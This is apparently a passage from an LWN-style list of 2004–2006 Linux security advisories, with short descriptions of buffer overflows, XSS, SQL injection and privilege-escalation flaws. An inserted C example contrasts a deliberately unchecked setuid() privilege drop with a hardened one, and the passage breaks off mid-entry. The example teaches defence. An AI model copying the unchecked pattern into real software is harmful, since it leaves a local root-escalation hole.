| CVE #(s): | CVE-2006-2607 |
| Created: | May 31, 2006 |
| Updated: | June 1, 2009 |
| Description: |
The Vixie cron daemon does not check the return code from setuid(); if that call can be made to fail, a local attacker may be able to execute commands as root.
Comments (1 posted)
cscope: buffer overflows
| Package(s): | cscope |
| CVE #(s): | CVE-2006-4262 |
| Created: | October 2, 2006 |
| Updated: | June 16, 2009 |
| Description: |
Will Drewry of the Google Security Team discovered several buffer overflows
in cscope, a source browsing tool, which might lead to the execution of
arbitrary code.
Comments (none posted)
cscope: buffer overflows
| Package(s): | cscope |
| CVE #(s): | CVE-2004-2541 |
| Created: | May 22, 2006 |
| Updated: | June 19, 2009 |
| Description: |
A buffer overflow in Cscope 15.5, and possibly multiple overflows, allows
remote attackers to execute arbitrary code via a C file with a long
#include line that is later browsed by the target.
Comments (1 posted)
Cyrus-SASL: DIGEST-MD5 Pre-Authentication Denial of Service
| Package(s): | cyrus-sasl |
| CVE #(s): | CVE-2006-1721 |
| Created: | April 21, 2006 |
| Updated: | September 4, 2007 |
| Description: |
Cyrus-SASL contains an unspecified vulnerability in the DIGEST-MD5
process that could lead to a Denial of Service. An attacker could possibly
exploit this vulnerability by sending a specially crafted data stream to the
Cyrus-SASL server, resulting in a Denial of Service even if the attacker is
not able to authenticate.
Comments (none posted)
dokuwiki: input validation flaws
| Package(s): | dokuwiki |
| CVE #(s): | |
| Created: | September 29, 2006 |
| Updated: | October 4, 2006 |
| Description: |
Input validation flaws have been discovered in the image handling of
fetch.php if ImageMagick is used, which is not the default method. A
remote attacker could exploit the flaws to execute arbitrary shell commands
with the rights of the web server daemon or cause a denial of service.
Comments (none posted)
ffmpeg: buffer overflows
| Package(s): | ffmpeg |
| CVE #(s): | CVE-2006-4799, CVE-2006-4800 |
| Created: | September 14, 2006 |
| Updated: | May 28, 2007 |
| Description: |
The AVI processing code in FFmpeg has a number of buffer overflow
vulnerabilities.
If an attacker can trick a user into loading a specially crafted
AVI, arbitrary code can be executed with the user's privileges.
Comments (2 posted)
flash-plugin: arbitrary code execution
| Package(s): | flash-plugin |
| CVE #(s): | CVE-2006-3311, CVE-2006-3587, CVE-2006-3588 |
| Created: | September 13, 2006 |
| Updated: | October 5, 2006 |
| Description: |
Security issues were discovered in the Adobe Flash Player. It may be
possible to execute arbitrary code on a victim's machine if the victim
opens a malicious Adobe Flash file.
Comments (none posted)
freeradius: several vulnerabilities
| Package(s): | freeradius |
| CVE #(s): | CVE-2005-4745, CVE-2005-4746 |
| Created: | August 8, 2006 |
| Updated: | April 24, 2007 |
| Description: |
Several remote vulnerabilities have been discovered in freeradius, a
high-performance RADIUS server, which may lead to SQL injection or denial
of service.
Comments (none posted)
freetype: integer overflows
| Package(s): | freetype |
| CVE #(s): | CVE-2006-0747, CVE-2006-1861, CVE-2006-2493, CVE-2006-2661, CVE-2006-3467 |
| Created: | June 8, 2006 |
| Updated: | June 1, 2010 |
| Description: |
The FreeType library has several integer overflow vulnerabilities.
If a user can be tricked into installing a specially
crafted font file, arbitrary code can be executed with the privileges
of the user.
Comments (none posted)
gcc: file overwrite vulnerability
| Package(s): | gcc |
| CVE #(s): | CVE-2006-3619 |
| Created: | September 6, 2006 |
| Updated: | March 14, 2008 |
| Description: |
The fastjar utility found in the GNU compiler collection does not perform adequate file path checking, allowing the creation or overwriting of files outside of the current directory tree.
Comments (none posted)
gdb: buffer overflow
| Package(s): | gdb |
| CVE #(s): | CVE-2006-4146 |
| Created: | September 15, 2006 |
| Updated: | June 12, 2007 |
| Description: |
A buffer overflow in dwarfread.c and dwarf2read.c debugging code in GNU
Debugger (GDB) 6.5 allows user-assisted attackers, or restricted users, to
execute arbitrary code via a crafted file with a location block
(DW_FORM_block) that contains a large number of operations.
Comments (none posted)
gdm: improper file permissions
| Package(s): | gdm |
| CVE #(s): | CVE-2006-1057 |
| Created: | April 19, 2006 |
| Updated: | May 2, 2007 |
| Description: |
The .ICEauthority file may be created with the wrong ownership and permissions; gdm 2.14.2 fixes the problem.
Comments (none posted)
gedit: format string vulnerability
| Package(s): | gedit |
| CVE #(s): | CAN-2005-1686 |
| Created: | June 9, 2005 |
| Updated: | February 5, 2009 |
| Description: |
A format string vulnerability has been discovered in gedit. Calling
the program with specially crafted file names caused a buffer
overflow, which could be exploited to execute arbitrary code with the
privileges of the gedit user.
Comments (1 posted)
grip: buffer overflow
| Package(s): | grip |
| CVE #(s): | CAN-2005-0706 |
| Created: | March 10, 2005 |
| Updated: | November 19, 2008 |
| Description: |
Grip, a CD ripper, has a buffer overflow vulnerability that can
occur when the CDDB server returns more than 16 matches.
Comments (none posted)
gzip: multiple vulnerabilities
| Package(s): | gzip |
| CVE #(s): | CVE-2006-4334, CVE-2006-4335, CVE-2006-4336, CVE-2006-4337, CVE-2006-4338 |
| Created: | September 19, 2006 |
| Updated: | January 20, 2010 |
| Description: |
Tavis Ormandy of the Google Security Team discovered two denial of service
flaws in the way gzip expanded archive files. If a victim expanded a
specially crafted archive, it could cause the gzip executable to hang or
crash.
Tavis Ormandy of the Google Security Team discovered several code execution
flaws in the way gzip expanded archive files. If a victim expanded a
specially crafted archive, it could cause the gzip executable to crash or
execute arbitrary code.
Comments (1 posted)
gzip: arbitrary command execution
| Package(s): | gzip |
| CVE #(s): | CAN-2005-0758 |
| Created: | August 1, 2005 |
| Updated: | January 10, 2007 |
| Description: |
zgrep in gzip before 1.3.5 does not handle shell metacharacters like '|'
and '&' properly when they occur in input file names. This could be
exploited to execute arbitrary commands with user privileges if zgrep is
run in an untrusted directory with specially crafted file names.
Comments (2 posted)
kdelibs: kate backup file permission leak
| Package(s): | kdelibs kate kwrite |
| CVE #(s): | CAN-2005-1920 |
| Created: | July 19, 2005 |
| Updated: | September 21, 2010 |
| Description: |
Kate / Kwrite, as shipped with KDE 3.2.x up to and including 3.4.0, creates a file backup before saving a modified file. These backup files are created with default permissions, even if the original file had more strict permissions set. See this advisory for more information.
Comments (1 posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-4535, CVE-2006-4538 |
| Created: | September 18, 2006 |
| Updated: | January 5, 2009 |
| Description: |
Sridhar Samudrala discovered a local denial of service vulnerability
in the handling of SCTP sockets. By opening such a socket with a
special SO_LINGER value, a local attacker could exploit this to crash
the kernel. (CVE-2006-4535)
Kirill Korotaev discovered that the ELF loader on the ia64 and sparc
platforms did not sufficiently verify the memory layout. By attempting
to execute a specially crafted executable, a local user could exploit
this to crash the kernel. (CVE-2006-4538)
Comments (none posted)
kernel: denial of service by memory consumption
| Package(s): | kernel |
| CVE #(s): | CVE-2006-2936 |
| Created: | July 17, 2006 |
| Updated: | November 14, 2007 |
| Description: |
The ftdi_sio driver (usb/serial/ftdi_sio.c) in Linux kernel 2.6.x up to
2.6.17, and possibly later versions, allows local users to cause a denial
of service (memory consumption) by writing more data to the serial port
than the driver can handle, which causes the data to be queued.
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-2935, CVE-2006-4145, CVE-2006-3745 |
| Created: | September 1, 2006 |
| Updated: | July 30, 2008 |
| Description: |
Previous versions of the kernel package are subject to several
vulnerabilities. Certain malformed UDF filesystems can cause the system to
crash (denial of service). Malformed CDROM firmware or USB storage devices
(such as USB keys) could cause a system crash (denial of service), and if
they were intentionally malformed, can cause arbitrary code to run with
elevated privileges. In addition, the SCTP protocol is subject to a remote
system crash (denial of service) attack.
Comments (none posted)
krb5: local privilege escalation
| Package(s): | krb5 |
| CVE #(s): | CVE-2006-3083 |
| Created: | August 9, 2006 |
| Updated: | July 7, 2010 |
| Description: |
Some kerberos applications fail to check the results of setuid() calls, with the result that, if that call fails, they could continue to execute as root after thinking they had switched to a nonprivileged user. A local attacker who can cause these calls to fail (through resource exhaustion, presumably) could exploit this bug to gain root privileges.
Comments (none posted)
libgadu: memory alignment bug
| Package(s): | libgadu |
| CVE #(s): | CAN-2005-2370 |
| Created: | July 29, 2005 |
| Updated: | June 25, 2007 |
| Description: |
Szymon Zygmunt and Michal Bartoszkiewicz discovered a memory alignment
error in libgadu (from ekg, a console Gadu Gadu client, an instant
messaging program), which is included in gaim, a multi-protocol instant
messaging client, as well. This cannot be exploited on the x86
architecture, but on others, e.g. Sparc, it can lead to a bus error,
in other words a denial of service.
Comments (none posted)
libgd2: denial of service
| Package(s): | libgd2 |
| CVE #(s): | CVE-2006-2906 |
| Created: | June 14, 2006 |
| Updated: | January 16, 2007 |
| Description: |
Certain GIF images can cause libgd2 to go into an infinite loop, adversely affecting the performance of image processing applications.
Comments (none posted)
libmms: buffer overflows
| Package(s): | libmms |
| CVE #(s): | CVE-2006-2200 |
| Created: | July 6, 2006 |
| Updated: | December 25, 2006 |
| Description: |
Several buffer overflows were found in libmms. By tricking a user into
opening a specially crafted remote multimedia stream with an application
using libmms, a remote attacker could overwrite an arbitrary memory portion
with zeros, thereby crashing the program.
Comments (none posted)
libmusicbrainz: buffer overflows
| Package(s): | libmusicbrainz-2.0 |
| CVE #(s): | CVE-2006-4197 |
| Created: | August 30, 2006 |
| Updated: | October 23, 2006 |
| Description: |
Several buffer overflows have been discovered in the libmusicbrainz CD index library.
Comments (none posted)
libpam-ldap: authentication bypass
| Package(s): | libpam-ldap |
| CVE #(s): | CAN-2005-2641 |
| Created: | August 25, 2005 |
| Updated: | October 6, 2006 |
| Description: |
libpam-ldap, the PAM LDAP interface, has a vulnerability in which
it fails to authenticate with an LDAP server which is not configured
properly, allowing an authentication bypass.
Comments (none posted)
libpng: buffer overflow
| Package(s): | libpng |
| CVE #(s): | CVE-2006-3334 |
| Created: | July 19, 2006 |
| Updated: | December 15, 2008 |
| Description: |
In pngrutil.c, the function png_decompress_chunk() allocates
insufficient space for an error message, potentially overwriting stack
data, leading to a buffer overflow.
Comments (none posted)
libpng: heap-based buffer overflow
| Package(s): | libpng |
| CVE #(s): | CVE-2006-0481 |
| Created: | February 13, 2006 |
| Updated: | December 15, 2008 |
| Description: |
A heap-based buffer overflow bug was found in the way libpng strips alpha
channels from a PNG image. An attacker could create a carefully crafted PNG
image file in such a way that it could cause an application linked with
libpng to crash or execute arbitrary code when the file is opened by a
victim.
Comments (1 posted)
libtiff: buffer overflow
| Package(s): | libtiff |
| CVE #(s): | CVE-2006-2193 |
| Created: | June 15, 2006 |
| Updated: | September 1, 2008 |
| Description: |
The t2p_write_pdf_string function in libtiff 3.8.2 and earlier is vulnerable
to a buffer overflow. Attackers can use a TIFF file with UTF-8 characters
in the DocumentName tag to overflow a buffer, causing a denial of service,
and possibly the execution of arbitrary code.
Comments (none posted)
libvncserver: authentication bypass
| Package(s): | libvncserver |
| CVE #(s): | CVE-2006-2450 |
| Created: | August 4, 2006 |
| Updated: | March 19, 2007 |
| Description: |
LibVNCServer fails to properly validate protocol types, effectively
letting users decide what protocol to use, such as "Type 1 - None".
LibVNCServer will accept this security type, even if it is not offered
by the server.
Comments (none posted)
libwmf: integer overflow
| Package(s): | libwmf |
| CVE #(s): | CVE-2006-3376 |
| Created: | July 13, 2006 |
| Updated: | November 6, 2006 |
| Description: |
libwmf, a library that is used for processing Windows MetaFile vector graphics files, has an integer overflow vulnerability.
Comments (none posted)
libxml2: arbitrary code execution
| Package(s): | libxml2 |
| CVE #(s): | CAN-2004-0110 |
| Created: | February 26, 2004 |
| Updated: | August 19, 2009 |
| Description: |
Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6.
When fetching a remote resource via FTP or HTTP, libxml2 uses special
parsing routines. These routines can overflow a buffer if passed a very
long URL. If an attacker is able to find an application using libxml2 that
parses remote resources and allows them to influence the URL, then this
flaw could be used to execute arbitrary code.
Comments (none posted)
libxml2: multiple buffer overflows
| Package(s): | libxml2 |
| CVE #(s): | CAN-2004-0989 |
| Created: | October 28, 2004 |
| Updated: | August 19, 2009 |
| Description: |
libxml2 prior to version 2.6.14 has multiple buffer overflow
vulnerabilities; if a local user passes a specially crafted
FTP URL, arbitrary code may be executed.
Comments (none posted)
lynx: arbitrary command execution
| Package(s): | lynx |
| CVE #(s): | CVE-2005-2929 |
| Created: | November 14, 2005 |
| Updated: | September 14, 2009 |
| Description: |
An arbitrary command execution bug was found in the lynx "lynxcgi:" URI
handler. An attacker could create a web page redirecting to a malicious URL
which could execute arbitrary code as the user running lynx.
Comments (none posted)
mailman: several vulnerabilities
| Package(s): | mailman |
| CVE #(s): | CVE-2006-2941, CVE-2006-3636 |
| Created: | September 8, 2006 |
| Updated: | October 23, 2006 |
| Description: |
A flaw was found in the way Mailman handled MIME multipart messages. An
attacker could send a carefully crafted MIME multipart email message to a
mailing list run by Mailman which caused that particular mailing list
to stop working. (CVE-2006-2941)
Several cross-site scripting (XSS) issues were found in Mailman. An
attacker could exploit these issues to perform cross-site scripting attacks
against the Mailman administrator. (CVE-2006-3636)
Comments (none posted)
migrationtools: insecure temporary files
| Package(s): | migrationtools |
| CVE #(s): | CVE-2006-0512 |
| Created: | October 2, 2006 |
| Updated: | October 4, 2006 |
| Description: |
Jason Hoover discovered that migrationtools, a collection of scripts
to migrate user data to LDAP, creates several temporary files insecurely,
which might lead to denial of service through a symlink attack.
Comments (none posted)
mono: symlink vulnerability
| Package(s): | mono |
| CVE #(s): | CVE-2006-5072 |
| Created: | October 4, 2006 |
| Updated: | December 1, 2006 |
| Description: |
The mono System.CodeDom.Compiler classes suffer from a temporary file symlink vulnerability which could be used to overwrite files, or, in this case, even inject arbitrary code into a running mono application.
Comments (none posted)
firefox: multiple vulnerabilities
| Package(s): | mozilla firefox thunderbird |
| CVE #(s): | CVE-2006-4565, CVE-2006-4566, CVE-2006-4571, CVE-2006-4253, CVE-2006-4567, CVE-2006-4568, CVE-2006-4569 |
| Created: | September 15, 2006 |
| Updated: | November 14, 2006 |
| Description: |
Two flaws were found in the way Firefox/Thunderbird processed certain regular
expressions. A malicious web page/HTML email could crash the browser or
possibly execute arbitrary code as the user running
Firefox/Thunderbird. (CVE-2006-4565, CVE-2006-4566)
A number of flaws were found in Firefox/Thunderbird. A malicious web
page/HTML email could crash the browser or possibly execute arbitrary code
as the user running Firefox/Thunderbird. (CVE-2006-4571)
A flaw was found in the handling of JavaScript timed events. A malicious
web page could crash the browser or possibly execute arbitrary code as the
user running Firefox/Thunderbird. (CVE-2006-4253)
A flaw was found in the Firefox/Thunderbird auto-update verification
system. An attacker who has the ability to spoof a victim's DNS could get
Firefox to download and install malicious code. In order to exploit this
issue an attacker would also need to get a victim to previously accept an
unverifiable certificate. (CVE-2006-4567)
Firefox did not properly prevent a frame in one domain from injecting
content into a sub-frame that belongs to another domain, which facilitates
website spoofing and other attacks. (CVE-2006-4568)
Firefox did not load manually opened, blocked popups in the right domain
context, which could lead to cross-site scripting attacks. In order to
exploit this issue an attacker would need to find a site which would frame
their malicious page and convince the user to manually open a blocked
popup. (CVE-2006-4569)
Comments (none posted)
mutt: IMAP namespace buffer overflow
| Package(s): | mutt |
| CVE #(s): | CVE-2006-3242 |
| Created: | June 28, 2006 |
| Updated: | October 24, 2006 |
| Description: |
TAKAHASHI Tamotsu discovered that mutt's IMAP backend did not sufficiently
check the validity of namespace strings. If a user connects to a malicious
IMAP server, that server could exploit this to crash mutt or even execute
arbitrary code with the privileges of the mutt user. See this Secunia advisory for more
information.
Comments (none posted)
mysql: format string bug
| Package(s): | mysql |
| CVE #(s): | CVE-2006-3469 |
| Created: | July 21, 2006 |
| Updated: | July 30, 2008 |
| Description: |
Jean-David Maillefer discovered a format string bug in the
date_format() function's error reporting. By calling the function with
invalid arguments, an authenticated user could exploit this to crash
the server.
Comments (none posted)
MySQL: privilege violations
| Package(s): | mysql |
| CVE #(s): | CVE-2006-4031, CVE-2006-4226 |
| Created: | August 25, 2006 |
| Updated: | July 30, 2008 |
| Description: |
MySQL 4.1 before 4.1.21 and 5.0 before 5.0.24 allows a local user to access
a table through a previously created MERGE table, even after the user's
privileges are revoked for the original table, which might violate intended
security policy (CVE-2006-4031).
MySQL 4.1 before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run
on case-sensitive filesystems, allows remote authenticated users to create
or access a database when the database name differs only in case from a
database for which they have permissions (CVE-2006-4226).
Comments (none posted)
MySQL: logging bypass
| Package(s): | mysql |
| CVE #(s): | CVE-2006-0903 |
| Created: | April 4, 2006 |
| Updated: | May 21, 2008 |
| Description: |
MySQL 5.0.18 and earlier allows local users to bypass logging mechanisms
via SQL queries that contain the NULL character, which are not properly
handled by the mysql_real_query function. NOTE: this issue was originally
reported for the mysql_query function, but the vendor states that since
mysql_query expects a null character, this is not an issue for mysql_query.
Comments (2 posted)
nbd: arbitrary code execution
| Package(s): | nbd |
| CVE #(s): | CVE-2005-3534 |
| Created: | January 6, 2006 |
| Updated: | March 7, 2011 |
| Description: |
Kurt Fitzner discovered that the NBD (network block device) server did not
correctly verify the maximum size of request packets. By sending specially
crafted large request packets, a remote attacker who is allowed to access
the server could exploit this to execute arbitrary code with root
privileges.
Comments (none posted)
ncompress: buffer underflow
| Package(s): | ncompress |
| CVE #(s): | CVE-2006-1168 |
| Created: | August 10, 2006 |
| Updated: | February 21, 2012 |
| Description: |
The ncompress compression utility has a missing boundary check.
A local user can use a maliciously created file to cause
a .bss buffer underflow.
Comments (none posted)
nss: signature forgery vulnerability
| Package(s): | nss |
| CVE #(s): | CVE-2006-4340 |
| Created: | September 15, 2006 |
| Updated: | October 18, 2006 |
| Description: |
Daniel Bleichenbacher recently described an implementation error in RSA
signature verification. For RSA keys with exponent 3 it is possible for an
attacker to forge a signature which would be incorrectly verified by
the NSS library.
Comments (1 posted)
openldap: security bypass
| Package(s): | openldap |
| CVE #(s): | CVE-2006-4600 |
| Created: | September 29, 2006 |
| Updated: | June 12, 2007 |
| Description: |
slapd in OpenLDAP before 2.3.25 allows remote authenticated users with
selfwrite Access Control List (ACL) privileges to modify arbitrary
Distinguished Names (DN).
Comments (none posted)
openoffice.org: several vulnerabilities
| Package(s): | openoffice.org |
| CVE #(s): | CVE-2006-2198, CVE-2006-2199, CVE-2006-3117 |
| Created: | June 30, 2006 |
| Updated: | January 4, 2007 |
| Description: |
Several vulnerabilities have been discovered in OpenOffice.org, a free
office suite.
- It turned out to be possible to embed arbitrary BASIC macros in
documents in a way that OpenOffice.org does not see them but executes them
anyway without any user interaction. (CVE-2006-2198)
- It is possible to evade the Java sandbox with specially crafted Java
applets. (CVE-2006-2199)
- Loading malformed XML documents can cause buffer overflows and cause a
denial of service or execute arbitrary code. (CVE-2006-3117)
Comments (none posted)
openssh: remote denial of service
| Package(s): | openssh |
| CVE #(s): | CVE-2006-4924, CVE-2006-5051 |
| Created: | September 27, 2006 |
| Updated: | September 17, 2008 |
| Description: |
OpenSSH 4.4 fixes several security issues, including a pre-authentication
denial of service, an unsafe signal handler and, on portable OpenSSH, a
GSSAPI authentication abort that could be used to determine the validity
of usernames on some platforms.
Comments (none posted)
openssl: insufficient signature checking
| Package(s): | openssl |
| CVE #(s): | CVE-2006-4339 |
| Created: | September 5, 2006 |
| Updated: | November 15, 2006 |
| Description: |
Philip Mackenzie, Marius Schilder, Jason Waddle and Ben Laurie of Google
Security discovered that the OpenSSL library did not sufficiently check the
padding of PKCS #1 v1.5 signatures if the exponent of the public key is 3
(which is widely used for CAs). This could be exploited to forge signatures
without the need of the secret key.
Comments (none posted)
openssl: multiple vulnerabilities
| Package(s): | openssl |
| CVE #(s): | CVE-2006-2937, CVE-2006-2940, CVE-2006-3780, CVE-2006-4343, CVE-2006-3738 |
| Created: | September 28, 2006 |
| Updated: | December 12, 2006 |
| Description: |
OpenSSL has a number of denial of service vulnerabilities including:
two vulnerabilities involving invalid ASN.1 structures, a buffer overflow
in the SSL_get_shared_ciphers() function and an SSLv2 client crash that
can be caused by a malicious server.
Comments (none posted)
opera: RSA signature forgery
| Package(s): | opera |
| CVE #(s): | |
| Created: | September 28, 2006 |
| Updated: | October 4, 2006 |
| Description: |
The Opera browser has a problem verifying OpenSSL PKCS #1
v1.5 RSA signatures. An attacker can use this to forge certificates
and appear as a valid CA.
Comments (none posted)
php: several vulnerabilities
| Package(s): | php |
| CVE #(s): | CVE-2006-4481, CVE-2006-4484, CVE-2006-4485 |
| Created: | September 8, 2006 |
| Updated: | June 13, 2008 |
| Description: |
The file_exists and imap_reopen functions in PHP before 5.1.5 do not check
for the safe_mode and open_basedir settings, which allows local users to
bypass the settings (CVE-2006-4481).
A buffer overflow in the LWZReadByte function in ext/gd/libgd/gd_gif_in.c
in the GD extension in PHP before 5.1.5 allows remote attackers to have an
unknown impact via a GIF file with input_code_size greater than
MAX_LWZ_BITS, which triggers an overflow when initializing the table array
(CVE-2006-4484).
The stripos function in PHP before 5.1.5 has unknown impact and attack
vectors related to an out-of-bounds read (CVE-2006-4485).
Comments (1 posted)
phpbb2: missing input sanitizing
| Package(s): | phpbb2 |
| CVE #(s): | CVE-2006-1896 |
| Created: | May 22, 2006 |
| Updated: | February 11, 2008 |
| Description: |
It was discovered that phpbb2, a web based bulletin board, insufficiently
sanitizes values passed to the "Font Color 3" setting, which might lead to
the execution of injected code by admin users.
Comments (none posted)
phpbb2: multiple vulnerabilities
| Package(s): | phpbb2 |
| CVE #(s): | CVE-2005-3310, CVE-2005-3415, CVE-2005-3416, CVE-2005-3417, CVE-2005-3418, CVE-2005-3419, CVE-2005-3420, CVE-2005-3536, CVE-2005-3537 |
| Created: | December 22, 2005 |
| Updated: | February 11, 2008 |
| Description: |
The phpbb2 web forum has a number of vulnerabilities including:
a web script injection problem, a protection mechanism bypass, a
security check bypass, a remote global variable bypass, cross site
scripting vulnerabilities, an SQL injection vulnerability,
a remote regular expression modification problem, missing input
sanitizing, and a missing request validation problem.
Comments (none posted)
phpMyAdmin: multiple vulnerabilities
| Package(s): | phpmyadmin |
| CVE #(s): | CVE-2005-4079, CVE-2005-3665 |
| Created: | December 12, 2005 |
| Updated: | November 20, 2006 |
| Description: |
Stefan Esser reported multiple vulnerabilities
found in phpMyAdmin. The $GLOBALS variable allows modifying the global
variable import_blacklist to open phpMyAdmin to local and remote file
inclusion, depending on your PHP version (CVE-2005-4079, PMASA-2005-9).
Furthermore, it is also possible to conduct an XSS attack via the
$HTTP_HOST variable and a local and remote file inclusion because the
contents of the variable are under total control of the attacker
(CVE-2005-3665, PMASA-2005-8).
Comments (none posted)
postgresql: SQL injection
| Package(s): | postgresql |
| CVE #(s): | CVE-2006-2313, CVE-2006-2314 |
| Created: | May 24, 2006 |
| Updated: | June 6, 2007 |
| Description: |
The PostgreSQL team has put out a set of "urgent updates" (in the form of the 7.3.15, 7.4.13, 8.0.8, and 8.1.4 releases) closing a
newly-discovered set of SQL injection issues. Details about the problem
can be found on the
technical information page; in short: multi-byte encodings can be used
to defeat normal string sanitizing techniques. The update fixes one problem
related to invalid multi-byte characters, but punts on another by simply
disallowing the old, unsafe technique of escaping single quotes with a
backslash.
Comments (1 posted)
quake: buffer overflow
| Package(s): | quake3-bin |
| CVE #(s): | CVE-2006-2236 |
| Created: | May 10, 2006 |
| Updated: | January 12, 2009 |
| Description: |
Games based on the Quake 3 engine are vulnerable to a buffer overflow exploitable by a hostile game server.
Comments (none posted)
sendmail: denial of service
| Package(s): | sendmail |
| CVE #(s): | CVE-2006-1173 |
| Created: | June 15, 2006 |
| Updated: | November 1, 2006 |
| Description: |
Sendmail has a vulnerability in the way it handles multi-part MIME messages.
A remote attacker can create a specially crafted email message that can
be used to crash the sendmail process, causing a denial of service.
Comments (none posted)
shadow-utils: mailbox creation vulnerability
| Package(s): | shadow-utils |
| CVE #(s): | CVE-2006-1174 |
| Created: | May 25, 2006 |
| Updated: | June 12, 2007 |
| Description: |
The useradd tool from the shadow-utils package has a potential security
problem. When a new user's mailbox is created, the permissions are
set to random garbage from the stack, potentially allowing the
file to be read or written during the time before fchmod() is called.
Comments (none posted)
texinfo: temporary file vulnerability
| Package(s): | texinfo |
| CVE #(s): | CAN-2005-3011 |
| Created: | October 5, 2005 |
| Updated: | November 9, 2006 |
| Description: |
Texinfo prior to version 4.8-r1 suffers from a temporary file vulnerability.
Comments (none posted)
tin: buffer overflow
| Package(s): | tin |
| CVE #(s): | CVE-2006-0804 |
| Created: | February 19, 2006 |
| Updated: | November 24, 2006 |
| Description: |
An allocation off-by-one bug exists in the TIN news reader version 1.8.0 and earlier
which can lead to a buffer overflow.
Comments (none posted)
unzip: long file name buffer overflow
| Package(s): | unzip |
| CVE #(s): | CVE-2005-4667 |
| Created: | February 6, 2006 |
| Updated: | May 2, 2007 |
| Description: |
A buffer overflow in UnZip 5.50 and earlier allows local users to execute
arbitrary code via a long filename command line argument. NOTE: since the
overflow occurs in a non-setuid program, there are not many scenarios under
which it poses a vulnerability, unless unzip is passed long arguments when
it is invoked from other programs.
Comments (1 posted)
w3c-libwww: possible stack overflow
Package(s): w3c-libwww
CVE #(s): CVE-2005-3183
Created: October 14, 2005
Updated: May 2, 2007
Description: Extensive testing of libwww's handling of multipart/byteranges
content from HTTP/1.1 servers revealed multiple logical flaws and bugs in
Library/src/HTBound.c.
Comments (1 posted)
webmin: cross-site scripting
Package(s): webmin
CVE #(s): CVE-2006-4542
Created: September 26, 2006
Updated: October 24, 2006
Description: Webmin before 1.296 and Usermin before 1.226 do not properly
handle a URL with a null ("%00") character, which allows remote attackers to
conduct cross-site scripting (XSS), read CGI program source code, list
directories, and possibly execute programs.
Comments (none posted)
wireshark: several vulnerabilities
Comments (none posted)
xine-lib: code execution
Package(s): xine-lib
CVE #(s): CVE-2006-4799
Created: October 4, 2006
Updated: November 21, 2006
Description: The xine-lib package does not properly validate AVI headers,
enabling an attacker to run arbitrary code via a specially crafted AVI file.
Comments (none posted)
xine-lib: buffer overflow
Package(s): xine-lib
CVE #(s): CVE-2006-1664
Created: April 27, 2006
Updated: February 27, 2008
Description: xine-lib does an improper input data boundary check on MPEG
streams. A specially crafted MPEG file can be created that can cause
arbitrary code execution when the file is accessed.
Comments (none posted)
xine-ui: format string vulnerabilities
Package(s): xine-ui
CVE #(s): CVE-2006-2230
Created: June 9, 2006
Updated: January 24, 2007
Description: Several format string vulnerabilities have been discovered in
xine-ui, the user interface of the xine video player, which may cause a
denial of service.
Comments (none posted)
X.org: local privilege escalations
Package(s): xorg-x11
CVE #(s): CVE-2006-4447
Created: August 28, 2006
Updated: April 30, 2007
Description: Several X.org libraries and X.org itself contain system calls
to set*uid() functions, without checking their result. Local users could
deliberately exceed their assigned resource limits and elevate their
privileges after an unsuccessful set*uid() system call. This requires
resource limits to be enabled on the machine.
Comments (none posted)
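The X.org entry above describes a bug class, not a single line of code: setuid() can fail (on Linux, with EAGAIN when the target uid is at its RLIMIT_NPROC process limit), and a program that ignores the return value carries on running as root. The following added example (not X.org code; the function names are assumptions) shows the unchecked pattern next to a privilege drop that checks every call, verifies the resulting ids, and confirms that root cannot be regained. The last check is what turns a silent failure into a hard error on a system where resource limits are in force.

```c
/* Added example, not from X.org: an unchecked set*uid() call beside a
 * privilege drop that checks and verifies each step. Function names are
 * this example's own. */
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* The vulnerable pattern the advisory describes: the result is ignored.
 * If setuid() fails (EAGAIN at RLIMIT_NPROC, for instance), execution
 * simply continues with the original, privileged ids. */
void drop_privileges_unchecked(uid_t uid)
{
    int r = setuid(uid);
    (void)r;                          /* deliberately ignored: this is the bug */
}

/* Hardened drop: returns 0 only if the process really runs as uid/gid
 * afterwards and can no longer become root; -1 (errno set) otherwise.
 * Order matters: supplementary groups and the gid must go while the
 * process still has the privilege to change them. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)             /* may fail: never assume success */
        return -1;

    /* Verify the kernel did what was asked, for real and effective ids. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid) {
        errno = EPERM;
        return -1;
    }
    /* A dropped process must not be able to regain root. If this setuid(0)
     * succeeds the drop was incomplete (e.g. only the effective id moved). */
    if (uid != 0 && setuid(0) == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Dropping to our own ids always succeeds and exercises every check;
     * a real daemon would pass the unprivileged service account here. */
    if (drop_privileges(getuid(), getgid()) != 0) {
        fprintf(stderr, "privilege drop failed: %s\n", strerror(errno));
        return 1;
    }
    printf("running as uid %u gid %u, root not regainable\n",
           (unsigned)getuid(), (unsigned)getgid());
    return 0;
}
```

A caller that cannot drop privileges should exit rather than continue; the advisory's point is precisely that "continue anyway" is the exploitable behaviour.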
X.Org: buffer overflow
Package(s): xorg-x11-server xorg-x11
CVE #(s): CVE-2006-1526
Created: May 3, 2006
Updated: January 10, 2007
Description: There is a buffer overflow in the Xrender extension of the X.Org
server; any process which is able to connect to the server may be able to
exploit this overflow to run arbitrary code. Since the X server runs as root
on most systems, this vulnerability could be exploited to gain root access.
See the X.Org advisory for more information.
Comments (none posted)
xorg-x11: privilege escalation
Package(s): xorg-x11 xfree86
CVE #(s): CVE-2006-3739, CVE-2006-3740
Created: September 12, 2006
Updated: December 14, 2006
Description: iDefense reported two integer overflow flaws in the way the
X.org server processed CID font files. A malicious authorized client could
exploit this issue to cause a denial of service (crash) or potentially
execute arbitrary code with root privileges on the X.org server.
Comments (none posted)
xpdf: buffer overflow
Package(s): xpdf
CVE #(s): CAN-2005-0064
Created: January 19, 2005
Updated: March 15, 2007
Description: iDEFENSE has found yet another xpdf buffer overflow; see this
advisory for details.
Comments (1 posted)
xpdf: integer overflows
Package(s): xpdf, poppler, cupsys, tetex-bin
CVE #(s): CVE-2005-3624, CVE-2005-3625, CVE-2005-3626, CVE-2005-3627
